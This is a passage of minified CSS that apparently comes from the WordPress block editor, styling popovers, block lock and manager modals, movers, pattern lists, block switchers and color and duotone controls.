visibility:hidden; } .is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{ opacity:0; } @media not (prefers-reduced-motion){ .is-dragging-components-draggable .components-popover.block-editor-block-list__block-popover{ animation:hide-during-dragging 1ms linear forwards; } } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{ left:-57px; position:absolute; } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector:before{ content:""; } .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ background-color:#fff; border:1px solid #1e1e1e; padding-left:6px; padding-right:6px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector .block-editor-block-parent-selector__button{ padding-left:12px; padding-right:12px; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-parent-selector{ left:auto; margin-left:-1px; position:relative; } .show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-mover__move-button-container,.show-icon-labels .components-popover.block-editor-block-list__block-popover .block-editor-block-toolbar__block-controls .block-editor-block-mover{ border-left:1px solid #1e1e1e; } .is-dragging-components-draggable .components-tooltip{ display:none; } .components-popover.block-editor-block-popover__inbetween .block-editor-button-pattern-inserter__button{ left:50%; pointer-events:all; position:absolute; top:50%; transform:translateX(-50%) translateY(-50%); } .block-editor-block-tools--is-dragging>.popover-slot{ display:none; } .block-editor-block-lock-modal{ z-index:1000001; } .block-editor-block-lock-modal__options{ border:0; margin:0; padding:0; } .block-editor-block-lock-modal__options legend{ margin-bottom:16px; padding:0; } .block-editor-block-lock-modal__checklist{ list-style:none; margin:0; padding:0; } .block-editor-block-lock-modal__options-all{ padding:12px 0; } .block-editor-block-lock-modal__options-all .components-checkbox-control__label{ font-weight:600; } .block-editor-block-lock-modal__checklist-item{ align-items:center; display:flex; gap:12px; justify-content:space-between; margin-bottom:0; padding:12px 0 12px 32px; } .block-editor-block-lock-modal__checklist-item .block-editor-block-lock-modal__lock-icon{ flex-shrink:0; margin-right:12px; fill:#1e1e1e; } .block-editor-block-lock-modal__checklist-item:hover{ background-color:#f0f0f0; border-radius:2px; } .block-editor-block-lock-modal__template-lock{ border-top:1px solid #ddd; margin-top:16px; padding-top:16px; } .block-editor-block-lock-modal__actions{ margin-top:24px; } .block-editor-block-lock-toolbar .components-button.has-icon{ min-width:36px !important; } .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{ margin-left:-6px !important; } .show-icon-labels .block-editor-block-toolbar__block-controls .block-editor-block-lock-toolbar{ border-left:1px solid #1e1e1e; margin-left:6px !important; margin-right:-6px; } .block-editor-block-allowed-blocks-control:not(:only-child){ margin-top:16px; } .block-editor-block-allowed-blocks-control__button{ justify-content:center; width:100%; } .block-editor-block-allowed-blocks-modal{ z-index:1000001; } .block-editor-block-allowed-blocks-modal__actions{ background-color:#fff; border-top:1px solid #ddd; bottom:-32px; left:0; margin:0 -32px -32px; padding:16px 32px; position:sticky; z-index:1; } .block-editor-block-breadcrumb{ list-style:none; margin:0; padding:0; } .block-editor-block-breadcrumb li{ display:inline-flex; margin:0; } .block-editor-block-breadcrumb li .block-editor-block-breadcrumb__separator{ fill:currentColor; margin-left:-4px; margin-right:-4px; transform:scaleX(1); } .block-editor-block-breadcrumb li:last-child .block-editor-block-breadcrumb__separator{ display:none; } .block-editor-block-breadcrumb__current{ cursor:default; } .block-editor-block-breadcrumb__button.block-editor-block-breadcrumb__button,.block-editor-block-breadcrumb__current{ color:#1e1e1e; font-size:inherit; padding:0 8px; } .block-editor-block-card{ align-items:flex-start; color:#1e1e1e; display:flex; padding:16px; } .block-editor-block-card__title{ align-items:center; display:flex; flex-wrap:wrap; font-weight:500; gap:4px 8px; } .block-editor-block-card__title.block-editor-block-card__title{ font-size:13px; line-height:1.4; margin:0; } .block-editor-block-card__name{ padding:3px 0; } .block-editor-block-card .block-editor-block-icon{ flex:0 0 24px; height:24px; margin-left:0; margin-right:12px; width:24px; } .block-editor-block-card.is-synced .block-editor-block-icon{ color:var(--wp-block-synced-color); } .block-editor-block-compare{ height:auto; } .block-editor-block-compare__wrapper{ display:flex; padding-bottom:16px; } .block-editor-block-compare__wrapper>div{ display:flex; flex-direction:column; justify-content:space-between; max-width:600px; min-width:200px; padding:0 16px 0 0; width:50%; } .block-editor-block-compare__wrapper>div button{ float:right; } .block-editor-block-compare__wrapper .block-editor-block-compare__converted{ border-left:1px solid #ddd; padding-left:15px; padding-right:0; } .block-editor-block-compare__wrapper .block-editor-block-compare__html{ border-bottom:1px solid #ddd; color:#1e1e1e; font-family:Menlo,Consolas,monaco,monospace; font-size:12px; line-height:1.7; padding-bottom:15px; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span{ background-color:#e6ffed; padding-bottom:3px; padding-top:3px; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__added{ background-color:#acf2bd; } .block-editor-block-compare__wrapper .block-editor-block-compare__html span.block-editor-block-compare__removed{ background-color:#cc1818; } .block-editor-block-compare__wrapper .block-editor-block-compare__preview{ padding:16px 0 0; } .block-editor-block-compare__wrapper .block-editor-block-compare__preview p{ font-size:12px; margin-top:0; } .block-editor-block-compare__wrapper .block-editor-block-compare__action{ margin-top:16px; } .block-editor-block-compare__wrapper .block-editor-block-compare__heading{ font-size:1em; font-weight:400; margin:.67em 0; } .block-editor-block-draggable-chip-wrapper{ left:0; position:absolute; top:-24px; } .block-editor-block-draggable-chip{ background-color:#1e1e1e; border-radius:2px; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; color:#fff; cursor:grabbing; display:inline-flex; height:48px; padding:0 13px; position:relative; -webkit-user-select:none; user-select:none; width:max-content; } .block-editor-block-draggable-chip svg{ fill:currentColor; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content{ justify-content:flex-start; margin:auto; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item{ margin-right:6px; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content>.components-flex__item:last-child{ margin-right:0; } .block-editor-block-draggable-chip .block-editor-block-draggable-chip__content .block-editor-block-icon svg{ min-height:18px; min-width:18px; } .block-editor-block-draggable-chip .components-flex__item{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ align-items:center; background-color:initial; bottom:0; display:flex; justify-content:center; left:0; opacity:0; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ transition:all .1s linear .1s; } } .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled .block-editor-block-draggable-chip__disabled-icon{ background:#0000 linear-gradient(-45deg, #0000 47.5%, #fff 0, #fff 52.5%, #0000 0); border-radius:50%; box-shadow:inset 0 0 0 1.5px #fff; display:inline-block; height:20px; padding:0; width:20px; } .block-draggable-invalid-drag-token .block-editor-block-draggable-chip__disabled.block-editor-block-draggable-chip__disabled{ background-color:#757575; box-shadow:0 1px 2px #0000000d,0 2px 3px #0000000a,0 6px 6px #00000008,0 8px 8px #00000005; opacity:1; } .block-editor-block-manager__no-results{ font-style:italic; padding:24px 0; text-align:center; } .block-editor-block-manager__category{ margin:0 0 24px; } .block-editor-block-manager__category-title{ background-color:#fff; padding:16px 0; position:sticky; top:-4px; z-index:1; } .block-editor-block-manager__category-title .components-checkbox-control__label{ font-weight:600; } .block-editor-block-manager__checklist{ margin-top:0; } .block-editor-block-manager__category-title,.block-editor-block-manager__checklist-item{ border-bottom:1px solid #ddd; } .block-editor-block-manager__checklist-item{ align-items:center; display:flex; justify-content:space-between; margin-bottom:0; padding:8px 0 8px 16px; } .components-modal__content .block-editor-block-manager__checklist-item.components-checkbox-control__input-container{ margin:0 8px; } .block-editor-block-manager__checklist-item .block-editor-block-icon{ margin-right:10px; fill:#1e1e1e; } .block-editor-block-manager__results{ border-top:1px solid #ddd; } .block-editor-block-manager__disabled-blocks-count+.block-editor-block-manager__results{ border-top-width:0; } .block-editor-block-mover__move-button-container{ border:none; display:flex; justify-content:center; padding:0; } @media (min-width:600px){ .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container{ flex-direction:column; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>*{ height:20px; min-width:0 !important; width:100%; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container>:before{ height:calc(100% - 4px); } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{ flex-shrink:0; top:3px; } .block-editor-block-mover:not(.is-horizontal) .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{ bottom:3px; flex-shrink:0; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container{ width:48px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container>*{ min-width:0 !important; overflow:hidden; width:24px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button{ padding-left:0; padding-right:0; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-up-button svg{ left:5px; } .block-editor-block-mover.is-horizontal .block-editor-block-mover__move-button-container .block-editor-block-mover-button.is-down-button svg{ right:5px; } } .block-editor-block-mover__drag-handle{ cursor:grab; } @media (min-width:600px){ .block-editor-block-mover__drag-handle{ min-width:0 !important; overflow:hidden; width:24px; } .block-editor-block-mover .block-editor-block-mover__drag-handle.has-icon.has-icon{ padding-left:0; padding-right:0; } } .components-button.block-editor-block-mover-button{ overflow:hidden; } .components-button.block-editor-block-mover-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .components-button.block-editor-block-mover-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .components-button.block-editor-block-mover-button:focus,.components-button.block-editor-block-mover-button:focus:before,.components-button.block-editor-block-mover-button:focus:enabled{ box-shadow:none; outline:none; } .components-button.block-editor-block-mover-button:focus-visible:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-navigation__container{ min-width:280px; } .block-editor-block-navigation__label{ color:#757575; font-size:11px; font-weight:500; margin:0 0 12px; text-transform:uppercase; } .block-editor-block-patterns-list__list-item{ cursor:pointer; margin-bottom:16px; position:relative; } .block-editor-block-patterns-list__list-item.is-placeholder{ min-height:100px; } .block-editor-block-patterns-list__list-item[draggable=true]{ cursor:grab; } .block-editor-block-patterns-list__item{ height:100%; outline:0; scroll-margin-bottom:56px; scroll-margin-top:24px; } .block-editor-block-patterns-list__item .block-editor-block-patterns-list__item-title{ flex-grow:1; font-size:12px; text-align:left; } .block-editor-block-patterns-list__item .block-editor-block-preview__container{ align-items:center; border-radius:4px; display:flex; overflow:hidden; } .block-editor-block-patterns-list__item .block-editor-block-preview__container:after{ border-radius:4px; outline:1px solid #0000001a; outline-offset:-1px; } @media not (prefers-reduced-motion){ .block-editor-block-patterns-list__item .block-editor-block-preview__container:after{ transition:outline .1s linear; } } .block-editor-block-patterns-list__item.is-selected .block-editor-block-preview__container:after{ outline-color:#1e1e1e; outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } .block-editor-block-patterns-list__item:hover .block-editor-block-preview__container:after{ outline-color:#0000004d; } .block-editor-block-patterns-list__item[data-focus-visible] .block-editor-block-preview__container:after{ outline-color:var(--wp-admin-theme-color); outline-offset:calc(var(--wp-admin-border-width-focus)*-1); outline-width:var(--wp-admin-border-width-focus); } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-details:not(:empty){ align-items:center; margin-top:8px; padding-bottom:4px; } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper{ height:24px; min-width:24px; } .block-editor-block-patterns-list__item .block-editor-patterns__pattern-icon-wrapper .block-editor-patterns__pattern-icon{ fill:var(--wp-block-synced-color); } .block-editor-patterns__grid-pagination-wrapper .block-editor-patterns__grid-pagination{ border-top:1px solid #2f2f2f; justify-content:center; padding:4px; } .show-icon-labels .block-editor-patterns__grid-pagination-button{ width:auto; } .show-icon-labels .block-editor-patterns__grid-pagination-button span{ display:none; } .show-icon-labels .block-editor-patterns__grid-pagination-button:before{ content:attr(aria-label); } .components-popover.block-editor-block-popover{ margin:0 !important; pointer-events:none; position:absolute; z-index:31; } .components-popover.block-editor-block-popover .components-popover__content{ margin:0 !important; min-width:auto; overflow-y:visible; width:max-content; } .components-popover.block-editor-block-popover:not(.block-editor-block-popover__inbetween,.block-editor-block-popover__drop-zone,.block-editor-block-list__block-side-inserter-popover) .components-popover__content *{ pointer-events:all; } .components-popover.block-editor-block-popover__inbetween,.components-popover.block-editor-block-popover__inbetween *{ pointer-events:none; } .components-popover.block-editor-block-popover__inbetween .is-with-inserter,.components-popover.block-editor-block-popover__inbetween .is-with-inserter *{ pointer-events:all; } .components-popover.block-editor-block-popover__drop-zone *{ pointer-events:none; } .components-popover.block-editor-block-popover__drop-zone .block-editor-block-popover__drop-zone-foreground{ background-color:var(--wp-admin-theme-color); border-radius:2px; inset:0; position:absolute; } .block-editor-block-preview__container{ overflow:hidden; position:relative; width:100%; } .block-editor-block-preview__container .block-editor-block-preview__content{ left:0; margin:0; min-height:auto; overflow:visible; text-align:initial; top:0; transform-origin:top left; width:100%; } .block-editor-block-preview__container .block-editor-block-preview__content .block-editor-block-list__insertion-point,.block-editor-block-preview__container .block-editor-block-preview__content .block-list-appender{ display:none; } .block-editor-block-preview__container:after{ bottom:0; content:""; left:0; position:absolute; right:0; top:0; z-index:1; } .block-editor-block-rename-modal{ z-index:1000001; } .block-editor-block-styles__preview-panel{ display:none; z-index:90; } @media (min-width:782px){ .block-editor-block-styles__preview-panel{ display:block; } } .block-editor-block-styles__preview-panel .block-editor-block-icon{ display:none; } .block-editor-block-styles__variants{ display:flex; flex-wrap:wrap; gap:8px; justify-content:space-between; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item{ box-shadow:inset 0 0 0 1px #ddd; color:#1e1e1e; display:inline-block; width:calc(50% - 4px); } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:hover{ box-shadow:inset 0 0 0 1px #ddd; color:var(--wp-admin-theme-color); } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover{ background-color:#1e1e1e; box-shadow:none; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active .block-editor-block-styles__item-text,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:hover .block-editor-block-styles__item-text{ color:#fff; } .block-editor-block-styles__variants button.components-button.block-editor-block-styles__item.is-active:focus,.block-editor-block-styles__variants button.components-button.block-editor-block-styles__item:focus{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-styles__variants .block-editor-block-styles__item-text{ text-align:start; text-align-last:center; white-space:normal; word-break:break-all; } .block-editor-block-styles__block-preview-container,.block-editor-block-styles__block-preview-container *{ box-sizing:border-box !important; } .block-editor-block-switcher{ position:relative; } .block-editor-block-switcher .components-button.components-dropdown-menu__toggle.has-icon.has-icon{ min-width:36px; } .block-editor-block-switcher__no-switcher-icon,.block-editor-block-switcher__toggle{ position:relative; } .components-button.block-editor-block-switcher__no-switcher-icon,.components-button.block-editor-block-switcher__toggle{ display:block; height:48px; margin:0; } .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.components-button.block-editor-block-switcher__toggle .block-editor-block-icon{ margin:auto; } .components-button.block-editor-block-switcher__no-switcher-icon{ display:flex; } .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon{ margin-left:auto; margin-right:auto; min-width:24px !important; } .components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true],.components-button.block-editor-block-switcher__no-switcher-icon[aria-disabled=true]:hover{ color:#1e1e1e; } .components-popover.block-editor-block-switcher__popover .components-popover__content{ min-width:300px; } .block-editor-block-switcher__popover-preview-container{ bottom:0; left:0; pointer-events:none; position:absolute; top:-1px; width:100%; } .block-editor-block-switcher__popover-preview{ overflow:hidden; } .block-editor-block-switcher__popover-preview .components-popover__content{ background:#fff; border:1px solid #1e1e1e; border-radius:4px; box-shadow:none; outline:none; overflow:auto; width:300px; } .block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview{ margin:16px 0; max-height:468px; overflow:hidden; padding:0 16px; } .block-editor-block-switcher__popover-preview .block-editor-block-switcher__preview.is-pattern-list-preview{ overflow:unset; } .block-editor-block-switcher__preview-title{ color:#757575; font-size:11px; font-weight:500; margin-bottom:12px; text-transform:uppercase; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon{ min-width:36px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle{ height:48px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-icon,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{ height:48px; width:48px; } .block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__no-switcher-icon .block-editor-block-switcher__transform,.block-editor-block-contextual-toolbar .components-button.block-editor-block-switcher__toggle .block-editor-block-switcher__transform{ padding:12px; } .block-editor-block-switcher__preview-patterns-container{ padding-bottom:16px; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item{ margin-top:16px; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-preview__container{ cursor:pointer; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ border-radius:2px; height:100%; } @media not (prefers-reduced-motion){ .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ transition:all .05s ease-in-out; } } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item{ border:1px solid #0000; position:relative; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:focus,.block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item:hover{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) #1e1e1e; } .block-editor-block-switcher__preview-patterns-container .block-editor-block-switcher__preview-patterns-container-list__list-item .block-editor-block-switcher__preview-patterns-container-list__item .block-editor-block-switcher__preview-patterns-container-list__item-title{ cursor:pointer; font-size:12px; padding:4px; text-align:center; } .block-editor-block-switcher__no-transforms{ color:#757575; margin:0; padding:6px 8px; } .block-editor-block-switcher__binding-indicator{ display:block; padding:8px; } .block-editor-block-types-list>[role=presentation]{ display:flex; flex-wrap:wrap; overflow:hidden; } .block-editor-block-pattern-setup{ align-items:flex-start; border-radius:2px; display:flex; flex-direction:column; justify-content:center; width:100%; } .block-editor-block-pattern-setup.view-mode-grid{ padding-top:4px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__toolbar{ justify-content:center; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{ column-count:2; column-gap:24px; display:block; padding:0 32px; width:100%; } @media (min-width:1440px){ .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container{ column-count:3; } } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-preview__container,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container div[role=button]{ cursor:pointer; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item{ scroll-margin:5px 0; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-preview__container{ box-shadow:0 0 0 2px var(--wp-admin-theme-color); } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-preview__container{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:focus .block-editor-block-pattern-setup-list__item-title,.block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__item:hover .block-editor-block-pattern-setup-list__item-title{ color:var(--wp-admin-theme-color); } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item{ break-inside:avoid-column; margin-bottom:24px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-pattern-setup-list__item-title{ cursor:pointer; font-size:12px; padding-top:8px; text-align:center; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__container{ border:1px solid #ddd; border-radius:4px; min-height:100px; } .block-editor-block-pattern-setup.view-mode-grid .block-editor-block-pattern-setup__container .block-editor-block-pattern-setup-list__list-item .block-editor-block-preview__content{ width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar{ align-items:center; align-self:stretch; background-color:#fff; border-top:1px solid #ddd; bottom:0; box-sizing:border-box; color:#1e1e1e; display:flex; flex-direction:row; height:64px; justify-content:space-between; margin:0; padding:16px; position:absolute; text-align:left; width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__display-controls{ display:flex; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions,.block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__navigation{ display:flex; width:calc(50% - 36px); } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__toolbar .block-editor-block-pattern-setup__actions{ justify-content:flex-end; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container{ box-sizing:border-box; display:flex; flex-direction:column; height:100%; width:100%; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container{ height:100%; list-style:none; margin:0; overflow:hidden; padding:0; position:relative; transform-style:preserve-3d; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container *{ box-sizing:border-box; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ background-color:#fff; height:100%; margin:auto; padding:0; position:absolute; top:0; width:100%; } @media not (prefers-reduced-motion){ .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ transition:transform .5s,z-index .5s; } } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide{ z-index:100; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.active-slide{ opacity:1; position:relative; z-index:102; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.previous-slide{ transform:translateX(-100%); z-index:101; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .carousel-container .pattern-slide.next-slide{ transform:translateX(100%); z-index:101; } .block-editor-block-pattern-setup .block-editor-block-pattern-setup__container .block-list-appender{ display:none; } .block-editor-block-pattern-setup__carousel,.block-editor-block-pattern-setup__grid{ width:100%; } .block-editor-block-variation-transforms:where(fieldset){ border:0; margin:0; padding:0; } .block-editor-block-variation-transforms{ box-sizing:border-box; padding:0 16px 16px 52px; width:100%; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle{ border:1px solid #757575; border-radius:2px; justify-content:left; min-height:30px; padding:6px 12px; position:relative; text-align:left; width:100%; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle.components-dropdown-menu__toggle{ padding-right:24px; } .block-editor-block-variation-transforms .components-dropdown-menu__toggle:focus:not(:disabled){ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 calc(var(--wp-admin-border-width-focus) - 1px) var(--wp-admin-theme-color); } .block-editor-block-variation-transforms .components-dropdown-menu__toggle svg{ height:100%; padding:0; position:absolute; right:0; top:0; } .block-editor-block-variation-transforms__popover .components-popover__content{ min-width:230px; } .components-border-radius-control__header{ height:16px; margin-bottom:12px; } .components-border-radius-control{ border:0; margin:0 0 12px; padding:0; } .components-border-radius-control legend{ margin-bottom:0; } .components-border-radius-control .components-border-radius-control__input-controls-wrapper{ display:grid; gap:16px; grid-template-columns:repeat(2, minmax(0, 1fr)); margin-right:12px; } .components-border-radius-control .components-border-radius-control__linked-button{ display:flex; justify-content:center; } .components-border-radius-control .components-border-radius-control__linked-button svg{ margin-right:0; } .components-border-radius-control__custom-select-control,.components-border-radius-control__range-control{ flex:1; } .components-border-radius-control__icon{ flex:0 0 auto; } .block-editor-color-gradient-control .block-editor-color-gradient-control__color-indicator{ margin-bottom:12px; } .block-editor-color-gradient-control__fieldset{ border:0; margin:0; min-width:0; padding:0; } .block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings,.block-editor-panel-color-gradient-settings.block-editor-panel-color-gradient-settings>div:not(:first-of-type){ display:block; } @media screen and (min-width:782px){ .block-editor-panel-color-gradient-settings .components-circular-option-picker__swatches{ display:grid; grid-template-columns:repeat(6, 28px); } } .block-editor-block-inspector .block-editor-panel-color-gradient-settings .components-base-control{ margin-bottom:inherit; } .block-editor-panel-color-gradient-settings__dropdown-content{ min-height:160px; } .block-editor-panel-color-gradient-settings__dropdown-content .block-editor-color-gradient-control__panel{ padding:16px; width:260px; } .block-editor-panel-color-gradient-settings__color-indicator{ background:linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .block-editor-tools-panel-color-gradient-settings__item{ border-bottom:1px solid #ddd; border-left:1px solid #ddd; border-right:1px solid #ddd; max-width:100%; padding:0; position:relative; } .block-editor-tools-panel-color-gradient-settings__item:nth-child(1 of .block-editor-tools-panel-color-gradient-settings__item){ border-top:1px solid #ddd; border-top-left-radius:2px; border-top-right-radius:2px; margin-top:24px; } .block-editor-tools-panel-color-gradient-settings__item:nth-last-child(1 of .block-editor-tools-panel-color-gradient-settings__item){ border-bottom-left-radius:2px; border-bottom-right-radius:2px; } .block-editor-tools-panel-color-gradient-settings__item>div,.block-editor-tools-panel-color-gradient-settings__item>div>button{ border-radius:inherit; } .block-editor-tools-panel-color-gradient-settings__dropdown{ display:block; padding:0; } .block-editor-tools-panel-color-gradient-settings__dropdown>button{ height:auto; padding-bottom:10px; padding-top:10px; text-align:left; } .block-editor-tools-panel-color-gradient-settings__dropdown>button.is-open{ background:#f0f0f0; color:var(--wp-admin-theme-color); } .block-editor-tools-panel-color-gradient-settings__dropdown .block-editor-panel-color-gradient-settings__color-name{ max-width:calc(100% - 44px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .block-editor-panel-color-gradient-settings__dropdown{ width:100%; } .block-editor-panel-color-gradient-settings__dropdown .component-color-indicator{ flex-shrink:0; } .block-editor-panel-color-gradient-settings__reset{ margin:auto 8px; opacity:0; position:absolute; right:0; top:8px; } @media not (prefers-reduced-motion){ .block-editor-panel-color-gradient-settings__reset{ transition:opacity .1s ease-in-out; } } .block-editor-panel-color-gradient-settings__reset.block-editor-panel-color-gradient-settings__reset{ border-radius:2px; } .block-editor-panel-color-gradient-settings__dropdown:hover+.block-editor-panel-color-gradient-settings__reset,.block-editor-panel-color-gradient-settings__reset:focus,.block-editor-panel-color-gradient-settings__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-panel-color-gradient-settings__reset{ opacity:1; } } .block-editor-date-format-picker{ border:none; margin:0 0 16px; padding:0; } .block-editor-date-format-picker__custom-format-select-control__custom-option{ border-top:1px solid #ddd; } .block-editor-duotone-control__popover.components-popover>.components-popover__content{ padding:8px; width:260px; } .block-editor-duotone-control__popover.components-popover .components-menu-group__label{ padding:0; } .block-editor-duotone-control__popover.components-popover .components-circular-option-picker__swatches{ display:grid; gap:12px; grid-template-columns:repeat(6, 28px); justify-content:space-between; } .block-editor-duotone-control__unset-indicator{ background:linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .components-font-appearance-control [role=option]{ color:#1e1e1e; text-transform:capitalize; } .block-editor-font-family-control:not(.is-next-has-no-margin-bottom){ margin-bottom:8px; } .block-editor-global-styles__toggle-icon{ fill:currentColor; } .block-editor-global-styles__shadow-popover-container{ 